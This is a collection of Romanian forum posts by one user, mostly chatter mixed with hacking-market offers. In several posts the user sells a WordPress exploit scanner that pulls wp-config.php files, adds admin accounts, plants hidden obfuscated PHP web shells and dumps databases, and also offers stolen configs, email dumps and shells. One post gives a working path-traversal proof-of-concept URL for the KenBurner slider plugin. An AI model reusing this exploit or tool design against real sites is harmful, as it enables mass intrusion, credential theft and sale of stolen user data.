Gio33

A, si ca sa mai expun un punct de vedere, ii si ajutati sa isi faca database cu datele voastre de contact + domiciliu, sa vedeti cand incep sa va vina diversi pe la usa cu cine stie ce cacaturi electorale + telefoane etc. Da stiu, o sa va dati mari smardoi ca nustiu ce le faceti, dar totusi, de ce sa va vindeti asa usor ...

Luati tricouri ca tot din banii vostri sunt cumparate ati ajuns sa va lamentati pentru un cacat de tricou inscriptionat cu jegu ala de partid, pentru maimitoiu ala ieftin de Ponta. Si stati linistiti ca un tricou d'ala mai mult de 2 lei nu e, va cumpara ca pe ultimii fraieri.

Scoate cartofii din pamant, face clatite d'alea bune.. Cateodata face bruteforce pe VNC-uri..

E de ajuns ca un vanzator sa isi indemne cumparatorii sa ii lase un feedback ca si visitor message pe profil , acelea sunt vizibile cand ii vizitezi profilul cuiva.

Pariez pe @Elohim, fat bastard. 1 milion de la na?u mare, s? tr?iasc?

"Ie frumos da nu prea" Bravo, dar baga mai multe in el, si numele nu il reprezinta (cum am mai zis de 100 de ori). Keep up the good work

Bine ai venit si felicitari pentru talentul tau in PS. Mult succes in continuare.

Am updatat din nou scanner-ul si primul post. Am adaugat cateva exploit-uri printre care kenburn plugin si cateva template-uri cu vuln. Am adaugat la scanner output-ul de categorie (nisa) a site-ului (ex: Business, Economy etc.) pentru o mai buna organizare. Inca prinde foarte foarte bine cu o lista decenta de site-uri, astept oferte pe PM. De asemenea am de vanzare aprox 10k configuri wordpress fresh (wp-config.php) , dump-uri de email-uri, useri cu acces de administrator, shell-uri, pe nise site / pagerank etc, astept intrebari pe pm.

Nu o sa tina fiindca cei care au abonament probabil au mereu si o sa i doara in cur sa raporteze ei pe aplicatie ca e control, iar cei fara bilet n-o sa stie cum sa coboare mai repede.

Cum pula mea asa ceva ma? Nu a mers sa-i zici ca l-ai gasit si nu ai avut timp sa-l aduci la politie? Sau luai legatura cu cel ce l-a pierdut si ii spuneai ca i l-ai gasit si sa isi retraga plangerea de la politie.

Felicitari, mergi si aprinde o lumanare pentru el si imparte o masa calda unui sarac

Felicitari, bravo!

La fel ca si exploitul cu revslider postat recent pe forum aici. Nume: WordPress KenBurner Slider Plugin (kbslider) Tip: Arbitrary file download Versiuni: Toate (se pare) Long story short, POC: http://site/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php Credits go to: MF0x and Daniel Pentest

Vai de capu meu de cand n am mai vazut o prezentare asa decenta. Welcome.

Instaleaza-ti firebug pe firefox si atunci cand nu iti iese ceva modifica direct din css-ul firebug, atunci o sa inveti fiindca o sa iti fie mai usor. Si invata sa cauti pe google ce ai nevoie (in engleza) ca o sa gasesti 100% rezolvari.

Nu este nici o intentie de reclama! Zilele trecute intreba cineva pe chat daca exista magazine online ce suporta paypal btc etc.. am gasit unul si mi-am si comandat un mouse pe BTC. Magazinul este www.altshop.ro, am comandat prin btc mouse-ul A4Tech R8A Bloody, au fost foarte rapizi cu email-urile, mi-au trimis suma in btc pe care o am de achitat si adresa la care sa o achit in 10 minute (din cauza fluctuatiilor). Am trimis plata, mi-au confirmat foarte rapid si in 2 zile a venit cu cargus (din pacate costa transportul dar overall eu zic ca se merita, il incluzi in btc oricum). Mai bagati si voi daca stiti magazine online serioase ce accepta astfel de metode de plata.

~300 lei, dar o sa fie greu sa il vinzi, fiindca e f vechi.

De plictiseala.. A/| }/5 4\# h-h_ Trimiteti pm.

Am updatat scanner-ul si primul post, inca astept oferte pe PM. Functii noi: Poate sa creeze shell php (un c99 modificat, destul de bun) obfuscat si ascuns undeva in plugins pe site-urile cu mysql deschis pe care s-a creat un user Poate sa faca dump si la tabelul de users cu emails si toate cele (poate unii sunt interesati doar de users si nu tot database-ul.. mai rapid astfel)

Fake nu inseamna neaparat prost, majoritatea fake-urilor de pe canalul ala de youtube sunt de cea mai buna calitate si au performante foarte bune, HDC-urile (replicile dupa S4 / S5 etc) au procesoare mtk chiar si octa core 1-2 gb ram etc.. eu am testat o replica de S4 si se misca flawless, nu mai zic de build quality si ecran foarte bun.

Intra pe youtube si cauta mayiandjay , este un user care face review uri la replici de telefoane, cauta ultimele S5 la care le a facut review, unele sunt crima Ps. Vezi ca el pune in descriere si linku se unde poti comanda. Succes.

In sfarsit, poate mai prinde si BTC / LTC niste putere... ca au tot cazut in ultimul an..

Cum spune si titlul, vand sursa scanner facut in python pentru wordpress exploit de revslider, kenburner si vreo 5 template-uri vulnerabile. UPDATE 07-03-2015: - updatat scanner cu shell wso 2.5.1 - updatat modul prin care shell-ul este uploadat, nu mai e cu plugin, acum 90% din cele care au mysql remote deschis vor putea injecta si shell - acum scoate si SMTP, daca wp-ul are mysql deschis remote si foloseste SMTP adaugat in setari din database UPDATE: - adaugat versiunea *2015* a vulnerabilitatii revslider - adaugat inca un plugin vulnerabil 1- Stocheaza toate wp-config intr-un folder (ex: configs/domain.tld.txt) 2- Stocheaza toate datele importante pe linii separate intr-un fisier (toate se vor regasi in acel fisier) 3- Daca mysql este deschis si accesibil, afiseaza toate DB 4- Daca mysql este deschis si accesibil, insereaza un user cu drepturi de admin(nume, mail, password hash, data inregistrarii etc customizabile, unele chiar din argumentele oferite la rulare) 5- Daca se insereaza un user si serverul permite scrierea de fisiere se poate crea shell ascuns undeva in pluginurile site-ului 6- Daca este selectat modul de dump database, unde este mysql deschis si accesibil se creeaza dump-uri la database-ul de wordpress intr-un folder separat (ex: dumps/domain.tld.sql), asta va ingreuna mult serverul pe care ruleaza deci este indicat sa mearga pe foarte putine thread-uri (plus ca ia multa memorie, mult cpu si spatiu pe disk). 7- Daca este selectat modul de dump users database, unde este mysql deschis si accesibil se creeaza dump-uri la tabelul de useri wordpress intr-un folder separat (ex: dumps/users_domain.tld.sql) , se aplica regulile de mai sus 8- Cu un anumit algoritm la fiecare rulare mai "taie" din userii fake, probabil unii facuti tot prin vuln asta etc. (nu este 100% functional, dar isi face treaba in anumite cazuri, poate fi dezactivat evident) 9- Scoate si cateogoria site-ului scanat (pe care se adauga admin user, ca altfel e destul de useless) ex: Business, Economy etc.. (nisa site-ului) 10- Tot ce este nevoie e o lista de website-uri wordpress (triate deja dupa plugin revslider/ jenburn/ templte-uri specificate sau ne-triate, cu un dork bun de google gasiti cateva sute de mii oricum), NU OFER SI LISTA DE SITE-URI, DOAR CATEVA DE TEST PENTRU CINE E CU ADEVARAT INTERESAT. A fost testat pe 500 threads si a scos 50 site-uri vuln in mai putin de 1 minut. Scannerul este scris de mine, nu o sa il mai gasiti nicaieri, si as dori sursa sa o vand , cumparatorul fiind liber sa o distribuie, sa o compileze sa faca ce vrea. Astept oferte si intrebari pe PM, plata in BTC de preferat, cine stie ce sa faca cu el o sa inteleaga valoarea (sa dau cateva exemple, unele wp au pagerank 5-6-7, cateva linkuri bine plasate va urca enorm.. , baze de date de useri / mailuri orientate pe diferite nise, baze de date de posturi .... review-uri , shell, smtp etc.. and so on) Ofer teamviewer si orice demo necesar (doar sa nu ma puneti sa filmez.. mai bine va arat live ce vreti Help-ul scannerului ca sa intelegeti mai bine unele lucruri: Options: -h, --help show this help message and exit -a, --add_user Add user with admin privileges into the vulnerable wordpress platforms with mysql opened. -u USER, --user=USER Admin username that you want to create on vulnerable wordpress platforms. -q, --quiet Be wevvy quiet, I'm hunting wabbits. -z, --upload_shell Upload a shell on the vulnerable wordpress platforms with mysql opened. -f FILE_NAME, --file_name=FILE_NAME Output file name (default is vuln.txt) -e EMAIL, --email=EMAIL Email to be used for the user created on vulnerable wordpress platforms. -t THREADS, --threads=THREADS Number of threads you want to run. -s SOURCE, --source=SOURCE Source file where you keep your wordpress websites one on each line (ex: domain.com , without http:// or www). -d, --dump_db VERY SLOW!!! RUN ON FEW THREADS ONLY! Dump database into dumps/domain.tld.sql for each vulnerable wordpress platforms with mysql accesible. -x, --dump_users VERY SLOW!!! RUN ON FEW THREADS ONLY! Dump users into dumps/users_domain.tld.sql for each vulnerable wordpress platforms with mysql accesible. Model output in fisier detalii: -+-+-+-+-+-+-+-+-+-+-+-+-+ [+] URL: domain.tld ( 176.xxx.xxx.xxx ) [=] PageRank: 5 [=] Category: Business, Economy [$] PHP SHELL: http://www.domain.tld/[..]/shell_name.php [*] 3306 opened: Yes [$] DATABASES ON SERVER: , information_schema, wb_database [@] Admin user created: Yes [*] DB_NAME: wb_db [+] DB_USER: wb_user [+] DB_PASSWORD: wbpass123 [+] DB_HOST: localhost -+-+-+-+-+-+-+-+-+-+-+-+-+ Va rog nu veniti cu comentarii de genu "frate deja are toata lumea, frate ti-l fac in juma de ora.., il vand eu pe 10 euro paypal.. " etc. Multumesc.

Mai multe detalii, se pot folosi mai multe astfel de cupoane? se pot obtine mai multe cupoane per account.. etc ? Thx.